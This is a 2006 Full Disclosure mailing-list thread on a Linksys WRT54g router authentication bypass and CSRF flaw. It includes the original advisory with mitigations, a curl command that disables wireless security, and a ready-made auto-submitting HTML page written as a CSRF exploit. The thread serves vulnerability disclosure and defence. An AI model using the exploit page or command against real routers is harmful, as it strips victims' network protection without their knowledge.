Full Disclosure mailing list archives
Re: linksys WRT54g authentication bypass
From: "Rob Thompson" <my.security.lists () gmail com>
Date: Fri, 10 Nov 2006 15:04:56 -0800
The firmware listed in the post is a very old firmware and should no longer be affected if you update to the more current release of 4.71.1. Also, I would recommend checking out Thibor's release instead. It's a much more robust release. http://www.thibor.co.uk Hope that this helps out a little bit. Rob. On 11/4/06, pagvac <unknown.pentester () gmail com> wrote:
Sorry I'm replying to this post after so long, but I was bored this morning and decided to create a specially-crafted HTML page that would allow me to replicate the unauth CSRF attack described by Ginsu Rabbit. Very interesting vuln btw :-) The following is the code for the specially-crafted HTML page. Unfortunately, I do not have a vulnerable Linksys router to test this, so I simply strictly followed the structure of the POST request as described in the advisory. Hopefully it should work. It'd be cool if someone could test this against a vulnerable model. Here is an on-line copy: http://ikwt.com/projects/linksys/BID19347_test.html <html> <head><title>BID 19347 specially-crafted html page - vuln found by Ginsu Rabbit</title></head> <body> <form action="http://192.168.0.1/Security.tri" method="POST"> <input type="hidden" name="SecurityMode" value="0"> <input type="hidden" name="layout" value="en"> </form> <script>document.forms[0].submit();</script> </body> </html> On 8/4/06, Ginsu Rabbit <ginsurabbit () hotmail com> wrote:I'm having some trouble believing this hasn't been reported before. If you have a linksys router handy, please check to see whether it is vulnerable to this attack. It's possible that all of the linksys router web UIs have the same bug. Hopefully the problem is isolated to one particular model or firmware revision. I. DESCRIPTION Tested product: Linksys WRT54g home router, firmware revision 1.00.9. Problem #1: No password validation for configuration settings. The WRT54g does not attempt to verify a username and password when configuration settings are being changed. If you wish to read configuration settings, you must provide the administrator ID and password via HTTP basic authentication. No similar check is done for configuration changes. This request results in a user-id and password prompt: GET /wireless.htm This request disables wireless security on the router, with no password prompt: POST /Security.tri Content-Length: 24 SecurityMode=0&layout=en Problem #2: Cross-site request forgery The web administration console does not verify that the request to change the router configuration is being made with the consent of the administrator. Any web site can force a browser to send a request to the linksys router, and the router will accept the request. II. Exploitation The combination of these two bugs means that any internet web site can change the configuration of your router. Recently published techniques for port-scanning and web server finger printing via java and javascript make this even easier. The attack scenario is as follows: - intranet user visits a malicious web site - malicious web site returns specially crafted HTML page - intranet user's browser automatically sends a request to the router that enables the remote administration interface - the owner of the malicious web site now has complete access to your router I'm not going to share the "specially crafted HTML page" at this time, but it isn't all that special. III. DETECTION If your router is vulnerable, the following curl command will disable wireless security on your router. Tests for other router models and firmware revisions may be different: curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri IV. MITIGATION 1) Make sure you've disabled the remote administration feature of your router. If you have this "feature" enabled, anybody on the internet can take control of the router. 2) Change the IP address of the router to a random value, preferably in the range assigned to private networks. For example, change the IP address to 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive. This makes it more difficult for an attacker to forge the request necessary to change the router configuration. This mitigation technique might not help much if you have a java-enabled browser, because of recently published techniques for determining gateway addresses via java applets. 3) Disable HTTP access to the administration interface of the router, allowing only HTTPS access. Under most circumstances, this will cause the browser to show a certificate warning before the configuration is changed. V. VENDOR NOTIFICATION Linksys customer support was notified on June 24, 2006. Full disclosure on August 4, 2006. -- GR _________________________________________________________________ Is your PC infected? Get a FREE online computer virus scan from McAfee(r) Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- pagvac [http://ikwt.com/] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- Rob _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: linksys WRT54g authentication bypass pagvac (Nov 04)
- Re: linksys WRT54g authentication bypass Rob Thompson (Nov 10)